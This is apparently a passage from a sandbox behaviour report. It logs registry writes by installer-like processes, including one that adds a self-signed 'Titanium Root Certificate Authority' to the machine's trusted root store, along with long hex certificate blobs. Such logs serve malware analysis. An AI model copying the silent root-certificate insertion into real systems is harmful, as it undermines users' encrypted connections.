4a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c1400000001000000140000006837e0ebb63bf85f1186fbfe617b088865f44e42040000000100000010000000d91299e84355cd8d5a86795a0118b6e90f000000010000003000000065b1d4076a89ae273f57e6eeedecb3eae129b4168f76fa7671914cdf461d542255c59d9b85b916ae0ca6fc0fcf7a8e64190000000100000010000000a344f71a7a52a76ee49b74b1d8816b155c000000010000000400000000100000180000000100000010000000ffac207997bb2cfe865570179ee037b94b0000000100000044000000430038004500350033003400450045003100320039004600320037004400350035003400360030004300450031003700460044003600320038003200310036005f0000002000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e AFK Journey.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a OperaGXSetup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD AFK Journey.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1\Blob = 190000000100000010000000cb9dd0fceaaa492f75ce292c21bbfbdd0300000001000000140000008094640eb5a7a1ca119c1fddd59f810263a7fbd17e00000001000000080000000080c82b6886d7017a000000010000000c000000300a06082b060105050703091d0000000100000010000000521f5c98970d19a8e515ef6eeb6d48ef140000000100000014000000ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a07f0000000100000016000000301406082b0601050507030306082b060105050703096200000001000000200000002cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf690b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520036000000090000000100000056000000305406082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007e000000307c301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301f06092b06010401a032010230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000030000000ea09c51d4c3a334ce4acd2bc08c6a9be352e334f45c4fccfcab63edb9f82dc87d4bd2ed2fadae11163fb954809984ff1200000000100000087050000308205833082036ba003020102020e45e6bb038333c3856548e6ff4551300d06092a864886f70d01010c0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3134313231303030303030305a170d3334313231303030303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820222300d06092a864886f70d01010105000382020f003082020a02820201009507e873ca66f9ec14ca7b3cf70d08f1b4450b2c82b448c6eb5b3cae83b841923314a46f7fe92accc6b0886bc5b689d1c6b2ff14ce511421ec4add1b5ac6d687ee4d3a1506ed64660b9280ca44de73944ef3a7897f4f786308c812506d42662f4db979284d521a8a1a80b719810e7ec48abc644c211c4368d73d3c8ac5b266d5909ab73106c5bee26d3206a61ef9b9ebaaa3b8bfbe826350d0f01889dfe40f79f5eaa21f2ad2702e7be7bc93bb6d53e2487c8c100738ff66b277617ee0ea8c3caab4a4f6f3954a12076dfd8cb289cfd0a06177c85874b0d4233af75d3acaa2db9d09de5d442d90f181cd5792fa7ebc50046334df6b9318be6b36b239e4ac2436b7f0efb61c135793b6deb2f8e285b773a2b835aa45f2e09d36a16f548af172566e2e88c55142441594eea3c538969b4e4e5a0b47f30636497730bc7137e5a6ec210875fce661163f77d5d99197840a6cd4024d74c014edfd39fb83f25e14a104b00be9feee8fe16e0bb208b36166096ab1063a659659c0f035fdc9da288d1a118770810aa89a751d9e3a8605009edb80d625f9dc059e27594c76395beaf9a5a1d8830fd1ffdf3011f985cf3348f5ca6d64142c7a584fd34b0849c595641a630e793df5b38cca58ad9c4245796e0e87195c54b165b6bf8c9bdc13e90d6fb82edc676ec98b11b584148a0019708379919791d41a27bf371e3207d814633c284caf0203010001a3633061300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0300d06092a864886f70d01010c050003820201008325ede8d1fd9552cd9ec004a09169e65cd084dedcada24fe84778d66598a95ba83c877c028ad16eb71673e65fc05498d574bec1cde21191ad23183ddde1724496b4955ec07b8e99781643135657b3a2b33bb577dc4072aca3eb9b353eb10821a1e7c443377932beb5e79c2c4cbc4329998e30d3ac21e0e31dfad80733765400222ab94d202e7068dae553fc835cd39df2ff440c4466f2d2e3bd46001a6d02ba255d8da13151dd54461c4ddb9996ef1a1c045ca615ef78e079fe5ddb3eaa4c55fd9a15a96fe1a6fbdf7030e9c3ee4246edc2930589fa7d637b3fd071817c00e898ae0e7834c325fbaf0a9f206bdd3b138f128ce2411a487a73a07769c7b65c7f82c81efe581b282ba86cad5e6dc005d27bb7eb80fe2537fe029b68ac425dc3eef5ccdcf05075d236699ce67b04df6e0669b6de0a09485987eb7b14607a64aa6943ef91c74cec18dd6cef532d8c99e15ef2723ecf54c8bd67eca40f4c45ffd3b93023074c8f10bf8696d9995ab499571ca4ccbb158953ba2c050fe4c49e19b11834d54c9dbaedf71faf24950478a803bbee81e5da5f7c8b4aa1907425a7b33e4bc82c56bdc7c8ef38e25c92f079f79c84ba742d6101207e7ed1f24f07595f8b2d4352eb460c94e1f566477977d5545b1fad2437cb455a4ea04448c8d8b099c5158409f6d64949c065b8e61a716ea0a8f182e8453e6cd602d70a6783055ac9a410 AFK Journey.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 OperaGXSetup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C AFK Journey.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f AFK Journey.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1\Blob = 0f0000000100000030000000ea09c51d4c3a334ce4acd2bc08c6a9be352e334f45c4fccfcab63edb9f82dc87d4bd2ed2fadae11163fb954809984ff153000000010000007e000000307c301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301f06092b06010401a032010230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000056000000305406082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d0020005200360000006200000001000000200000002cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf697f0000000100000016000000301406082b0601050507030306082b06010505070309140000000100000014000000ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a01d0000000100000010000000521f5c98970d19a8e515ef6eeb6d48ef7a000000010000000c000000300a06082b060105050703097e00000001000000080000000080c82b6886d7010300000001000000140000008094640eb5a7a1ca119c1fddd59f810263a7fbd1200000000100000087050000308205833082036ba003020102020e45e6bb038333c3856548e6ff4551300d06092a864886f70d01010c0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3134313231303030303030305a170d3334313231303030303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820222300d06092a864886f70d01010105000382020f003082020a02820201009507e873ca66f9ec14ca7b3cf70d08f1b4450b2c82b448c6eb5b3cae83b841923314a46f7fe92accc6b0886bc5b689d1c6b2ff14ce511421ec4add1b5ac6d687ee4d3a1506ed64660b9280ca44de73944ef3a7897f4f786308c812506d42662f4db979284d521a8a1a80b719810e7ec48abc644c211c4368d73d3c8ac5b266d5909ab73106c5bee26d3206a61ef9b9ebaaa3b8bfbe826350d0f01889dfe40f79f5eaa21f2ad2702e7be7bc93bb6d53e2487c8c100738ff66b277617ee0ea8c3caab4a4f6f3954a12076dfd8cb289cfd0a06177c85874b0d4233af75d3acaa2db9d09de5d442d90f181cd5792fa7ebc50046334df6b9318be6b36b239e4ac2436b7f0efb61c135793b6deb2f8e285b773a2b835aa45f2e09d36a16f548af172566e2e88c55142441594eea3c538969b4e4e5a0b47f30636497730bc7137e5a6ec210875fce661163f77d5d99197840a6cd4024d74c014edfd39fb83f25e14a104b00be9feee8fe16e0bb208b36166096ab1063a659659c0f035fdc9da288d1a118770810aa89a751d9e3a8605009edb80d625f9dc059e27594c76395beaf9a5a1d8830fd1ffdf3011f985cf3348f5ca6d64142c7a584fd34b0849c595641a630e793df5b38cca58ad9c4245796e0e87195c54b165b6bf8c9bdc13e90d6fb82edc676ec98b11b584148a0019708379919791d41a27bf371e3207d814633c284caf0203010001a3633061300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0300d06092a864886f70d01010c050003820201008325ede8d1fd9552cd9ec004a09169e65cd084dedcada24fe84778d66598a95ba83c877c028ad16eb71673e65fc05498d574bec1cde21191ad23183ddde1724496b4955ec07b8e99781643135657b3a2b33bb577dc4072aca3eb9b353eb10821a1e7c443377932beb5e79c2c4cbc4329998e30d3ac21e0e31dfad80733765400222ab94d202e7068dae553fc835cd39df2ff440c4466f2d2e3bd46001a6d02ba255d8da13151dd54461c4ddb9996ef1a1c045ca615ef78e079fe5ddb3eaa4c55fd9a15a96fe1a6fbdf7030e9c3ee4246edc2930589fa7d637b3fd071817c00e898ae0e7834c325fbaf0a9f206bdd3b138f128ce2411a487a73a07769c7b65c7f82c81efe581b282ba86cad5e6dc005d27bb7eb80fe2537fe029b68ac425dc3eef5ccdcf05075d236699ce67b04df6e0669b6de0a09485987eb7b14607a64aa6943ef91c74cec18dd6cef532d8c99e15ef2723ecf54c8bd67eca40f4c45ffd3b93023074c8f10bf8696d9995ab499571ca4ccbb158953ba2c050fe4c49e19b11834d54c9dbaedf71faf24950478a803bbee81e5da5f7c8b4aa1907425a7b33e4bc82c56bdc7c8ef38e25c92f079f79c84ba742d6101207e7ed1f24f07595f8b2d4352eb460c94e1f566477977d5545b1fad2437cb455a4ea04448c8d8b099c5158409f6d64949c065b8e61a716ea0a8f182e8453e6cd602d70a6783055ac9a410 AFK Journey.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1\Blob = 0400000001000000100000004fdd07e4d42264391e0c3742ead1c6ae0f0000000100000030000000ea09c51d4c3a334ce4acd2bc08c6a9be352e334f45c4fccfcab63edb9f82dc87d4bd2ed2fadae11163fb954809984ff153000000010000007e000000307c301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301f06092b06010401a032010230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000056000000305406082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d0020005200360000006200000001000000200000002cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf697f0000000100000016000000301406082b0601050507030306082b06010505070309140000000100000014000000ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a01d0000000100000010000000521f5c98970d19a8e515ef6eeb6d48ef7a000000010000000c000000300a06082b060105050703097e00000001000000080000000080c82b6886d7010300000001000000140000008094640eb5a7a1ca119c1fddd59f810263a7fbd1190000000100000010000000cb9dd0fceaaa492f75ce292c21bbfbdd200000000100000087050000308205833082036ba003020102020e45e6bb038333c3856548e6ff4551300d06092a864886f70d01010c0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3134313231303030303030305a170d3334313231303030303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820222300d06092a864886f70d01010105000382020f003082020a02820201009507e873ca66f9ec14ca7b3cf70d08f1b4450b2c82b448c6eb5b3cae83b841923314a46f7fe92accc6b0886bc5b689d1c6b2ff14ce511421ec4add1b5ac6d687ee4d3a1506ed64660b9280ca44de73944ef3a7897f4f786308c812506d42662f4db979284d521a8a1a80b719810e7ec48abc644c211c4368d73d3c8ac5b266d5909ab73106c5bee26d3206a61ef9b9ebaaa3b8bfbe826350d0f01889dfe40f79f5eaa21f2ad2702e7be7bc93bb6d53e2487c8c100738ff66b277617ee0ea8c3caab4a4f6f3954a12076dfd8cb289cfd0a06177c85874b0d4233af75d3acaa2db9d09de5d442d90f181cd5792fa7ebc50046334df6b9318be6b36b239e4ac2436b7f0efb61c135793b6deb2f8e285b773a2b835aa45f2e09d36a16f548af172566e2e88c55142441594eea3c538969b4e4e5a0b47f30636497730bc7137e5a6ec210875fce661163f77d5d99197840a6cd4024d74c014edfd39fb83f25e14a104b00be9feee8fe16e0bb208b36166096ab1063a659659c0f035fdc9da288d1a118770810aa89a751d9e3a8605009edb80d625f9dc059e27594c76395beaf9a5a1d8830fd1ffdf3011f985cf3348f5ca6d64142c7a584fd34b0849c595641a630e793df5b38cca58ad9c4245796e0e87195c54b165b6bf8c9bdc13e90d6fb82edc676ec98b11b584148a0019708379919791d41a27bf371e3207d814633c284caf0203010001a3633061300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0300d06092a864886f70d01010c050003820201008325ede8d1fd9552cd9ec004a09169e65cd084dedcada24fe84778d66598a95ba83c877c028ad16eb71673e65fc05498d574bec1cde21191ad23183ddde1724496b4955ec07b8e99781643135657b3a2b33bb577dc4072aca3eb9b353eb10821a1e7c443377932beb5e79c2c4cbc4329998e30d3ac21e0e31dfad80733765400222ab94d202e7068dae553fc835cd39df2ff440c4466f2d2e3bd46001a6d02ba255d8da13151dd54461c4ddb9996ef1a1c045ca615ef78e079fe5ddb3eaa4c55fd9a15a96fe1a6fbd